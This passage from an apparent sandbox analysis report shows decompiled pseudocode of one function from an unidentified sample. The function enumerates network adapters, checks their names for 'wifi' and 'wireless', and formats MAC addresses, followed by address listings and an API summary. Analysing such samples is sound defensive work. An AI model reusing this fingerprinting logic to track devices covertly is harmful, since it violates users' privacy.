				E00C90D20( *((intOrPtr*)(_t252 + 0x64)));
				E00C95100(_t252 + 0x38);
				 *((intOrPtr*)(_t252 + 0x60)) = 0;
				_t109 = E00C948D0(_t245, _t252 + 0x38);
				_t253 = _t252 + 4;
				if(_t109 != 0) {
					_t224 = GetProcessHeap;
					 *(_t253 + 0x24) = 0x288;
					_t110 = GetProcessHeap();
					_t236 = HeapAlloc;
					_t246 = HeapAlloc(_t110, 0, 0x288);
					 *(_t253 + 0x28) = _t246;
					__eflags = _t246;
					if(_t246 != 0) {
						_t112 = _t253 + 0x1c;
						_push(_t112);
						_push(_t246);
						L00D2F374();
						__eflags = _t112 - 0x6f;
						if(_t112 != 0x6f) {
							L12:
							_t215 = _t253 + 0x1c;
							_push(_t215);
							_push(_t246);
							 *(_t253 + 0x2c) = 1;
							L00D2F374();
							__eflags = _t112;
							if(_t112 != 0) {
								L62:
								__eflags = _t246 - _t178;
								if(_t246 != _t178) {
									HeapFree(GetProcessHeap(), _t178, _t246);
								}
								goto L64;
							} else {
								__eflags = _t246 - _t178;
								if(_t246 == _t178) {
									L64:
									_t216 =  *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x64))));
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x64)))) - 0xc)) - _t178;
									_t237 = 0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x64)))) - 0xc)) != _t178;
									_t115 =  *(_t253 + 0x44);
									__eflags =  *(_t253 + 0x44) - _t178;
									if(__eflags != 0) {
										_t224 =  *(_t253 + 0x48);
										E00C95640(_t115, _t216,  *(_t253 + 0x48));
										E00D0068E(_t178, _t216,  *(_t253 + 0x48), _t237, __eflags,  *(_t253 + 0x44));
										_t253 = _t253 + 4;
									}
									 *(_t253 + 0x48) = _t178;
									 *(_t253 + 0x4c) = _t178;
									 *(_t253 + 0x50) = _t178;
									E00D0068E(_t178,  *(_t253 + 0x38), _t224, _t237, __eflags,  *(_t253 + 0x38));
									 *[fs:0x0] =  *((intOrPtr*)(_t253 + 0x58));
									return _t237;
								} else {
									do {
										_t239 =  *(_t253 + 0x44);
										__eflags = _t239 -  *(_t253 + 0x48);
										if(_t239 >  *(_t253 + 0x48)) {
											E00D06565();
										}
										_t180 =  *(_t253 + 0x38);
										 *(_t253 + 0x30) = _t180;
										while(1) {
											_t226 =  *(_t253 + 0x48);
											 *(_t253 + 0x34) = _t239;
											__eflags =  *(_t253 + 0x44) - _t226;
											if( *(_t253 + 0x44) > _t226) {
												E00D06565();
											}
											__eflags = _t180;
											if(_t180 == 0) {
												goto L22;
											}
											L21:
											__eflags = _t180 -  *(_t253 + 0x38);
											if(_t180 !=  *(_t253 + 0x38)) {
												goto L22;
											}
											L23:
											__eflags = _t239 - _t226;
											if(_t239 == _t226) {
												break;
											} else {
												__eflags =  *((intOrPtr*)(_t246 + 0x190)) - 6;
												if( *((intOrPtr*)(_t246 + 0x190)) != 6) {
													L33:
													_t181 = 0;
													__eflags = 0;
													goto L34;
												} else {
													_t42 = _t246 + 8; // 0x8
													_t194 = _t42;
													_t151 = E00C95070(_t194, _t246, _t253 + 0x2c);
													 *((char*)(_t253 + 0x5c)) = 1;
													 *(_t253 + 0x18) =  *(_t253 + 0x18) | 0x00000001;
													_t230 =  *_t151;
													__eflags = _t180;
													if(_t180 != 0) {
														_t152 =  *_t180;
													} else {
														E00D06565();
														_t152 = 0;
														__eflags = 0;
													}
													__eflags = _t239 -  *((intOrPtr*)(_t152 + 0x10));
													if(_t239 >=  *((intOrPtr*)(_t152 + 0x10))) {
														E00D06565();
													}
													_t230 = _t230 != 0;
													if(_t230 != 0) {
														L67:
														_t140 = E00C8DF10(0x80004005);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t180);
														_t182 = _t194;
														E00C95320(_t140, _t182);
														return _t182;
													} else {
														_t156 = E00D00DF1(_t215,  *_t239, _t230);
														_t253 = _t253 + 8;
														__eflags = _t156;
														if(_t156 != 0) {
															goto L33;
														} else {
															_t181 = 1;
														}
														L34:
														 *((intOrPtr*)(_t253 + 0x5c)) = 0;
														__eflags =  *(_t253 + 0x18) & 0x00000001;
														if(( *(_t253 + 0x18) & 0x00000001) != 0) {
															 *(_t253 + 0x18) =  *(_t253 + 0x18) & 0xfffffffe;
															_t147 =  *(_t253 + 0x2c) + 0xfffffff0;
															asm("lock xadd [ecx], edx");
															_t215 = (_t215 | 0xffffffff) - 1;
															__eflags = _t215;
															if(_t215 <= 0) {
																_t215 =  *( *_t147);
																 *((intOrPtr*)( *((intOrPtr*)(_t215 + 4))))(_t147);
															}
														}
														__eflags = _t181;
														if(_t181 == 0) {
															L54:
															_t123 =  *(_t253 + 0x30);
															__eflags = _t123;
															if(_t123 != 0) {
																_t124 =  *_t123;
															} else {
																E00D06565();
																_t124 = 0;
																__eflags = 0;
															}
															__eflags = _t239 -  *((intOrPtr*)(_t124 + 0x10));
															if(_t239 >=  *((intOrPtr*)(_t124 + 0x10))) {
																E00D06565();
															}
															_t180 =  *(_t253 + 0x30);
															_t239 = _t239 + 4;
															_t226 =  *(_t253 + 0x48);
															 *(_t253 + 0x34) = _t239;
															__eflags =  *(_t253 + 0x44) - _t226;
															if( *(_t253 + 0x44) > _t226) {
																E00D06565();
															}
															__eflags = _t180;
															if(_t180 == 0) {
																goto L22;
															}
															goto L23;
														} else {
															_t127 =  *((intOrPtr*)(_t246 + 0x1a0));
															_t240 = 0;
															__eflags = _t127 - 0x47;
															if(_t127 == 0x47) {
																L42:
																_t240 = 1;
																goto L43;
															} else {
																__eflags = _t127 - 6;
																if(_t127 != 6) {
																	L53:
																	_t239 =  *(_t253 + 0x34);
																	goto L54;
																} else {
																	_t59 = _t246 + 0x10c; // 0x10c
																	_t229 = _t59;
																	_t144 = StrStrIA(_t229, "wifi");
																	__eflags = _t144;
																	if(_t144 != 0) {
																		goto L42;
																	} else {
																		_t145 = StrStrIA(_t229, "wireless");
																		__eflags = _t145;
																		if(_t145 != 0) {
																			goto L42;
																		}
																	}
																	L43:
																	__eflags =  *(_t253 + 0x24);
																	if( *(_t253 + 0x24) != 0) {
																		L45:
																		_t219 =  *0xd68c98; // 0xd46f14
																		_t61 = _t219 + 0xc; // 0xd2f706
																		 *((intOrPtr*)(_t253 + 0x20)) =  *((intOrPtr*)( *_t61))() + 0x10;
																		 *((char*)(_t253 + 0x5c)) = 2;
																		_push( *(_t246 + 0x199) & 0x000000ff);
																		_push( *(_t246 + 0x198) & 0x000000ff);
																		_push( *(_t246 + 0x197) & 0x000000ff);
																		_push( *(_t246 + 0x196) & 0x000000ff);
																		_push( *(_t246 + 0x195) & 0x000000ff);
																		E00C920F0("%02X%02X%02X%02X%02X%02X",  *(_t246 + 0x194) & 0x000000ff);
																		_t180 =  *(_t253 + 0x80);
																		_t134 =  *_t180;
																		_t228 =  *((intOrPtr*)(_t253 + 0x3c));
																		_t253 = _t253 + 0x1c;
																		__eflags =  *(_t134 - 0xc);
																		if( *(_t134 - 0xc) == 0) {
																			L50:
																			E00C95320(_t253 + 0x20, _t180);
																			goto L51;
																		} else {
																			__eflags =  *(_t253 + 0x24) - 1;
																			if( *(_t253 + 0x24) != 1) {
																				L48:
																				__eflags = _t134;
																				_t194 = 0 | _t134 != 0x00000000;
																				__eflags = _t194;
																				if(_t194 == 0) {
																					goto L67;
																				} else {
																					_t143 = E00D0E585(_t228, _t134);
																					_t253 = _t253 + 8;
																					__eflags = _t143;
																					if(_t143 < 0) {
																						goto L50;
																					}
																					L51:
																					__eflags = _t240;
																					_t137 = _t228 - 0x10;
																					 *((char*)(_t253 + 0x5c)) = 0;
																					_t82 =  &(_t137[3]); // 0xc8ef47
																					_t215 = _t82;
																					 *(_t253 + 0x24) = 0 | _t240 != 0x00000000;
																					asm("lock xadd [edx], ecx");
																					__eflags = 0xfffffffffffffffe;
																					if(0xfffffffffffffffe <= 0) {
																						_t215 =  *( *_t137);
																						_t84 = _t215 + 4; // 0x3300d3a3
																						 *((intOrPtr*)( *_t84))(_t137);
																					}
																					goto L53;
																				}
																			} else {
																				__eflags = _t240;
																				if(_t240 == 0) {
																					goto L50;
																				} else {
																					goto L48;
																				}
																			}
																		}
																	} else {
																		__eflags = _t240;
																		if(_t240 != 0) {
																			goto L53;
																		} else {
																			goto L45;
																		}
																	}
																}
															}
														}
													}
												}
											}
											goto L68;
											L22:
											E00D06565();
											goto L23;
										}
										_t246 =  *_t246;
										__eflags = _t246;
									} while (_t246 != 0);
									_t246 =  *(_t253 + 0x28);
									_t224 = GetProcessHeap;
									_t178 = 0;
									__eflags = 0;
									goto L62;
								}
							}
						} else {
							HeapFree(GetProcessHeap(), 0, _t246);
							_t112 = HeapAlloc(GetProcessHeap(), 0,  *(_t253 + 0x1c));
							 *(_t253 + 0x28) = _t112;
							__eflags = _t112;
							if(_t112 != 0) {
								_t246 = _t112;
								goto L12;
							} else {
								E00C95160(0, _t253 + 0x38);
								__eflags = 0;
								 *[fs:0x0] =  *((intOrPtr*)(_t253 + 0x54));
								return 0;
							}
						}
					} else {
						_t166 =  *(_t253 + 0x44);
						__eflags =  *(_t253 + 0x44);
						if(__eflags != 0) {
							_t224 =  *(_t253 + 0x48);
							E00C95640(_t166, _t214,  *(_t253 + 0x48));
							E00D0068E(0, _t214,  *(_t253 + 0x48), HeapAlloc, __eflags,  *(_t253 + 0x44));
							_t253 = _t253 + 4;
						}
						 *(_t253 + 0x48) = _t178;
						 *(_t253 + 0x4c) = _t178;
						 *(_t253 + 0x50) = _t178;
						E00D0068E(_t178,  *(_t253 + 0x38), _t224, _t236, __eflags,  *(_t253 + 0x38));
						__eflags = 0;
						 *[fs:0x0] =  *((intOrPtr*)(_t253 + 0x58));
						return 0;
					}
				} else {
					_t171 =  *(_t253 + 0x44);
					_t263 =  *(_t253 + 0x44);
					if( *(_t253 + 0x44) != 0) {
						_t223 =  *(_t253 + 0x48);
						E00C95640(_t171, _t214,  *(_t253 + 0x48));
						_t214 =  *(_t253 + 0x44);
						E00D0068E(0,  *(_t253 + 0x44),  *(_t253 + 0x48), _t235, _t263,  *(_t253 + 0x44));
						_t253 = _t253 + 4;
					}
					 *(_t253 + 0x48) = _t178;
					 *(_t253 + 0x4c) = _t178;
					 *(_t253 + 0x50) = _t178;
					E00D0068E(_t178, _t214, _t223, _t235, _t263,  *(_t253 + 0x38));
					 *[fs:0x0] =  *((intOrPtr*)(_t253 + 0x58));
					return 0;
				}
				L68:
			}







































                                                                                                                                                                                          0x00c94b30
                                                                                                                                                                                          0x00c94b30
                                                                                                                                                                                          0x00c94b30
                                                                                                                                                                                          0x00c94b32
                                                                                                                                                                                          0x00c94b3d
                                                                                                                                                                                          0x00c94b3e
                                                                                                                                                                                          0x00c94b42
                                                                                                                                                                                          0x00c94b44
                                                                                                                                                                                          0x00c94b45
                                                                                                                                                                                          0x00c94b4c
                                                                                                                                                                                          0x00c94b51
                                                                                                                                                                                          0x00c94b57
                                                                                                                                                                                          0x00c94b5b
                                                                                                                                                                                          0x00c94b5d
                                                                                                                                                                                          0x00c94b61
                                                                                                                                                                                          0x00c94b6b
                                                                                                                                                                                          0x00c94b75
                                                                                                                                                                                          0x00c94b79
                                                                                                                                                                                          0x00c94b7e
                                                                                                                                                                                          0x00c94b83
                                                                                                                                                                                          0x00c94bd2
                                                                                                                                                                                          0x00c94bde
                                                                                                                                                                                          0x00c94be6
                                                                                                                                                                                          0x00c94be8
                                                                                                                                                                                          0x00c94bf1
                                                                                                                                                                                          0x00c94bf3
                                                                                                                                                                                          0x00c94bf7
                                                                                                                                                                                          0x00c94bf9
                                                                                                                                                                                          0x00c94c48
                                                                                                                                                                                          0x00c94c4c
                                                                                                                                                                                          0x00c94c4d
                                                                                                                                                                                          0x00c94c4e
                                                                                                                                                                                          0x00c94c53
                                                                                                                                                                                          0x00c94c56
                                                                                                                                                                                          0x00c94c97
                                                                                                                                                                                          0x00c94c97
                                                                                                                                                                                          0x00c94c9b
                                                                                                                                                                                          0x00c94c9c
                                                                                                                                                                                          0x00c94c9d
                                                                                                                                                                                          0x00c94ca5
                                                                                                                                                                                          0x00c94caa
                                                                                                                                                                                          0x00c94cac
                                                                                                                                                                                          0x00c94efe
                                                                                                                                                                                          0x00c94efe
                                                                                                                                                                                          0x00c94f00
                                                                                                                                                                                          0x00c94f07
                                                                                                                                                                                          0x00c94f07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94cb2
                                                                                                                                                                                          0x00c94cb2
                                                                                                                                                                                          0x00c94cb4
                                                                                                                                                                                          0x00c94f0d
                                                                                                                                                                                          0x00c94f11
                                                                                                                                                                                          0x00c94f15
                                                                                                                                                                                          0x00c94f1b
                                                                                                                                                                                          0x00c94f1d
                                                                                                                                                                                          0x00c94f21
                                                                                                                                                                                          0x00c94f23
                                                                                                                                                                                          0x00c94f25
                                                                                                                                                                                          0x00c94f29
                                                                                                                                                                                          0x00c94f33
                                                                                                                                                                                          0x00c94f38
                                                                                                                                                                                          0x00c94f38
                                                                                                                                                                                          0x00c94f40
                                                                                                                                                                                          0x00c94f44
                                                                                                                                                                                          0x00c94f48
                                                                                                                                                                                          0x00c94f4c
                                                                                                                                                                                          0x00c94f5a
                                                                                                                                                                                          0x00c94f69
                                                                                                                                                                                          0x00c94cc0
                                                                                                                                                                                          0x00c94cc0
                                                                                                                                                                                          0x00c94cc0
                                                                                                                                                                                          0x00c94cc4
                                                                                                                                                                                          0x00c94cc8
                                                                                                                                                                                          0x00c94cca
                                                                                                                                                                                          0x00c94cca
                                                                                                                                                                                          0x00c94ccf
                                                                                                                                                                                          0x00c94cd3
                                                                                                                                                                                          0x00c94cd7
                                                                                                                                                                                          0x00c94cd7
                                                                                                                                                                                          0x00c94cdb
                                                                                                                                                                                          0x00c94cdf
                                                                                                                                                                                          0x00c94ce3
                                                                                                                                                                                          0x00c94ce5
                                                                                                                                                                                          0x00c94ce5
                                                                                                                                                                                          0x00c94cea
                                                                                                                                                                                          0x00c94cec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94cee
                                                                                                                                                                                          0x00c94cee
                                                                                                                                                                                          0x00c94cf2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94cf9
                                                                                                                                                                                          0x00c94cf9
                                                                                                                                                                                          0x00c94cfb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94d01
                                                                                                                                                                                          0x00c94d01
                                                                                                                                                                                          0x00c94d08
                                                                                                                                                                                          0x00c94d5f
                                                                                                                                                                                          0x00c94d5f
                                                                                                                                                                                          0x00c94d5f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94d0a
                                                                                                                                                                                          0x00c94d0e
                                                                                                                                                                                          0x00c94d0e
                                                                                                                                                                                          0x00c94d12
                                                                                                                                                                                          0x00c94d17
                                                                                                                                                                                          0x00c94d1c
                                                                                                                                                                                          0x00c94d21
                                                                                                                                                                                          0x00c94d23
                                                                                                                                                                                          0x00c94d25
                                                                                                                                                                                          0x00c94d5b
                                                                                                                                                                                          0x00c94d27
                                                                                                                                                                                          0x00c94d27
                                                                                                                                                                                          0x00c94d2c
                                                                                                                                                                                          0x00c94d2c
                                                                                                                                                                                          0x00c94d2c
                                                                                                                                                                                          0x00c94d2e
                                                                                                                                                                                          0x00c94d31
                                                                                                                                                                                          0x00c94d33
                                                                                                                                                                                          0x00c94d33
                                                                                                                                                                                          0x00c94d3f
                                                                                                                                                                                          0x00c94d41
                                                                                                                                                                                          0x00c94f6a
                                                                                                                                                                                          0x00c94f6f
                                                                                                                                                                                          0x00c94f74
                                                                                                                                                                                          0x00c94f75
                                                                                                                                                                                          0x00c94f76
                                                                                                                                                                                          0x00c94f77
                                                                                                                                                                                          0x00c94f78
                                                                                                                                                                                          0x00c94f79
                                                                                                                                                                                          0x00c94f7a
                                                                                                                                                                                          0x00c94f7b
                                                                                                                                                                                          0x00c94f7c
                                                                                                                                                                                          0x00c94f7d
                                                                                                                                                                                          0x00c94f7e
                                                                                                                                                                                          0x00c94f7f
                                                                                                                                                                                          0x00c94f80
                                                                                                                                                                                          0x00c94f81
                                                                                                                                                                                          0x00c94f83
                                                                                                                                                                                          0x00c94f8b
                                                                                                                                                                                          0x00c94d47
                                                                                                                                                                                          0x00c94d4b
                                                                                                                                                                                          0x00c94d50
                                                                                                                                                                                          0x00c94d53
                                                                                                                                                                                          0x00c94d55
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94d57
                                                                                                                                                                                          0x00c94d57
                                                                                                                                                                                          0x00c94d57
                                                                                                                                                                                          0x00c94d61
                                                                                                                                                                                          0x00c94d61
                                                                                                                                                                                          0x00c94d69
                                                                                                                                                                                          0x00c94d6e
                                                                                                                                                                                          0x00c94d74
                                                                                                                                                                                          0x00c94d79
                                                                                                                                                                                          0x00c94d82
                                                                                                                                                                                          0x00c94d86
                                                                                                                                                                                          0x00c94d87
                                                                                                                                                                                          0x00c94d89
                                                                                                                                                                                          0x00c94d8d
                                                                                                                                                                                          0x00c94d93
                                                                                                                                                                                          0x00c94d93
                                                                                                                                                                                          0x00c94d89
                                                                                                                                                                                          0x00c94d95
                                                                                                                                                                                          0x00c94d97
                                                                                                                                                                                          0x00c94ebe
                                                                                                                                                                                          0x00c94ebe
                                                                                                                                                                                          0x00c94ec2
                                                                                                                                                                                          0x00c94ec4
                                                                                                                                                                                          0x00c94ee3
                                                                                                                                                                                          0x00c94ec6
                                                                                                                                                                                          0x00c94ec6
                                                                                                                                                                                          0x00c94ecb
                                                                                                                                                                                          0x00c94ecb
                                                                                                                                                                                          0x00c94ecb
                                                                                                                                                                                          0x00c94ecd
                                                                                                                                                                                          0x00c94ed0
                                                                                                                                                                                          0x00c94ed2
                                                                                                                                                                                          0x00c94ed2
                                                                                                                                                                                          0x00c94ed7
                                                                                                                                                                                          0x00c94edb
                                                                                                                                                                                          0x00c94cd7
                                                                                                                                                                                          0x00c94cdb
                                                                                                                                                                                          0x00c94cdf
                                                                                                                                                                                          0x00c94ce3
                                                                                                                                                                                          0x00c94ce5
                                                                                                                                                                                          0x00c94ce5
                                                                                                                                                                                          0x00c94cea
                                                                                                                                                                                          0x00c94cec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94d9d
                                                                                                                                                                                          0x00c94d9d
                                                                                                                                                                                          0x00c94da3
                                                                                                                                                                                          0x00c94da5
                                                                                                                                                                                          0x00c94da8
                                                                                                                                                                                          0x00c94dd7
                                                                                                                                                                                          0x00c94dd7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94daa
                                                                                                                                                                                          0x00c94daa
                                                                                                                                                                                          0x00c94dad
                                                                                                                                                                                          0x00c94eba
                                                                                                                                                                                          0x00c94eba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94db3
                                                                                                                                                                                          0x00c94dbe
                                                                                                                                                                                          0x00c94dbe
                                                                                                                                                                                          0x00c94dc5
                                                                                                                                                                                          0x00c94dc7
                                                                                                                                                                                          0x00c94dc9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94dcb
                                                                                                                                                                                          0x00c94dd1
                                                                                                                                                                                          0x00c94dd3
                                                                                                                                                                                          0x00c94dd5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94dd5
                                                                                                                                                                                          0x00c94ddc
                                                                                                                                                                                          0x00c94ddc
                                                                                                                                                                                          0x00c94de1
                                                                                                                                                                                          0x00c94deb
                                                                                                                                                                                          0x00c94deb
                                                                                                                                                                                          0x00c94df1
                                                                                                                                                                                          0x00c94dfe
                                                                                                                                                                                          0x00c94e02
                                                                                                                                                                                          0x00c94e1c
                                                                                                                                                                                          0x00c94e24
                                                                                                                                                                                          0x00c94e2c
                                                                                                                                                                                          0x00c94e34
                                                                                                                                                                                          0x00c94e35
                                                                                                                                                                                          0x00c94e40
                                                                                                                                                                                          0x00c94e45
                                                                                                                                                                                          0x00c94e4c
                                                                                                                                                                                          0x00c94e4e
                                                                                                                                                                                          0x00c94e52
                                                                                                                                                                                          0x00c94e55
                                                                                                                                                                                          0x00c94e59
                                                                                                                                                                                          0x00c94e83
                                                                                                                                                                                          0x00c94e87
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94e5b
                                                                                                                                                                                          0x00c94e5b
                                                                                                                                                                                          0x00c94e60
                                                                                                                                                                                          0x00c94e66
                                                                                                                                                                                          0x00c94e68
                                                                                                                                                                                          0x00c94e6a
                                                                                                                                                                                          0x00c94e6d
                                                                                                                                                                                          0x00c94e6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94e75
                                                                                                                                                                                          0x00c94e77
                                                                                                                                                                                          0x00c94e7c
                                                                                                                                                                                          0x00c94e7f
                                                                                                                                                                                          0x00c94e81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94e8c
                                                                                                                                                                                          0x00c94e8e
                                                                                                                                                                                          0x00c94e93
                                                                                                                                                                                          0x00c94e96
                                                                                                                                                                                          0x00c94e9b
                                                                                                                                                                                          0x00c94e9b
                                                                                                                                                                                          0x00c94e9e
                                                                                                                                                                                          0x00c94ea7
                                                                                                                                                                                          0x00c94eac
                                                                                                                                                                                          0x00c94eae
                                                                                                                                                                                          0x00c94eb2
                                                                                                                                                                                          0x00c94eb5
                                                                                                                                                                                          0x00c94eb8
                                                                                                                                                                                          0x00c94eb8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94eae
                                                                                                                                                                                          0x00c94e62
                                                                                                                                                                                          0x00c94e62
                                                                                                                                                                                          0x00c94e64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94e64
                                                                                                                                                                                          0x00c94e60
                                                                                                                                                                                          0x00c94de3
                                                                                                                                                                                          0x00c94de3
                                                                                                                                                                                          0x00c94de5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94de5
                                                                                                                                                                                          0x00c94de1
                                                                                                                                                                                          0x00c94dad
                                                                                                                                                                                          0x00c94da8
                                                                                                                                                                                          0x00c94d97
                                                                                                                                                                                          0x00c94d41
                                                                                                                                                                                          0x00c94d08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94cf4
                                                                                                                                                                                          0x00c94cf4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94cf4
                                                                                                                                                                                          0x00c94ee7
                                                                                                                                                                                          0x00c94eea
                                                                                                                                                                                          0x00c94eea
                                                                                                                                                                                          0x00c94ef2
                                                                                                                                                                                          0x00c94ef6
                                                                                                                                                                                          0x00c94efc
                                                                                                                                                                                          0x00c94efc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94efc
                                                                                                                                                                                          0x00c94cb4
                                                                                                                                                                                          0x00c94c58
                                                                                                                                                                                          0x00c94c5d
                                                                                                                                                                                          0x00c94c6c
                                                                                                                                                                                          0x00c94c6e
                                                                                                                                                                                          0x00c94c72
                                                                                                                                                                                          0x00c94c74
                                                                                                                                                                                          0x00c94c95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94c76
                                                                                                                                                                                          0x00c94c7a
                                                                                                                                                                                          0x00c94c7f
                                                                                                                                                                                          0x00c94c85
                                                                                                                                                                                          0x00c94c94
                                                                                                                                                                                          0x00c94c94
                                                                                                                                                                                          0x00c94c74
                                                                                                                                                                                          0x00c94bfb
                                                                                                                                                                                          0x00c94bfb
                                                                                                                                                                                          0x00c94bff
                                                                                                                                                                                          0x00c94c01
                                                                                                                                                                                          0x00c94c03
                                                                                                                                                                                          0x00c94c07
                                                                                                                                                                                          0x00c94c11
                                                                                                                                                                                          0x00c94c16
                                                                                                                                                                                          0x00c94c16
                                                                                                                                                                                          0x00c94c1e
                                                                                                                                                                                          0x00c94c22
                                                                                                                                                                                          0x00c94c26
                                                                                                                                                                                          0x00c94c2a
                                                                                                                                                                                          0x00c94c32
                                                                                                                                                                                          0x00c94c38
                                                                                                                                                                                          0x00c94c47
                                                                                                                                                                                          0x00c94c47
                                                                                                                                                                                          0x00c94b85
                                                                                                                                                                                          0x00c94b85
                                                                                                                                                                                          0x00c94b89
                                                                                                                                                                                          0x00c94b8b
                                                                                                                                                                                          0x00c94b8d
                                                                                                                                                                                          0x00c94b91
                                                                                                                                                                                          0x00c94b96
                                                                                                                                                                                          0x00c94b9b
                                                                                                                                                                                          0x00c94ba0
                                                                                                                                                                                          0x00c94ba0
                                                                                                                                                                                          0x00c94ba8
                                                                                                                                                                                          0x00c94bac
                                                                                                                                                                                          0x00c94bb0
                                                                                                                                                                                          0x00c94bb4
                                                                                                                                                                                          0x00c94bc2
                                                                                                                                                                                          0x00c94bd1
                                                                                                                                                                                          0x00c94bd1
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C948D0: RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318},00000000,00000008,?,8A9E1774,00000000,?,?,00000000), ref: 00C9493D
                                                                                                                                                                                            • Part of subcall function 00C948D0: RegEnumKeyExW.ADVAPI32 ref: 00C94980
                                                                                                                                                                                            • Part of subcall function 00C948D0: RegOpenKeyExW.ADVAPI32(?), ref: 00C949B3
                                                                                                                                                                                            • Part of subcall function 00C948D0: RegCloseKey.ADVAPI32(?,00000000), ref: 00C949F4
                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00C94BE6
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00C94BEF
                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00C94C4E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C94C5A
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00C94C5D
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00C94C69
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00C94C6C
                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00C94CA5
                                                                                                                                                                                          • __wcsicoll.LIBCMT ref: 00C94D4B
                                                                                                                                                                                          • StrStrIA.SHLWAPI(0000010C,wifi), ref: 00C94DC5
                                                                                                                                                                                          • StrStrIA.SHLWAPI(0000010C,wireless), ref: 00C94DD1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 00C94F04
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00C94F07
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$AdaptersAllocFreeInfoOpen$CloseEnum__wcsicoll
                                                                                                                                                                                          • String ID: %02X%02X%02X%02X%02X%02X$wifi$wireless
                                                                                                                                                                                          • API String ID: 3423256894-294613102
                                                                                                                                                                                          • Opcode ID: 12b380307c73cf6cd80c7ceb5cf4c276ea178e271ec83aedfb3685b1859a002f
                                                                                                                                                                                          • Instruction ID: 8020f1590e40bd14690ed00920a8d310da12cb4c38100f957f92361a887873fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12b380307c73cf6cd80c7ceb5cf4c276ea178e271ec83aedfb3685b1859a002f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EC1C1726083409FCB14EF69C888A6FB7E4FF89310F444A2DF99587251DB75E905CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C96A40 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 260fileCOMMON
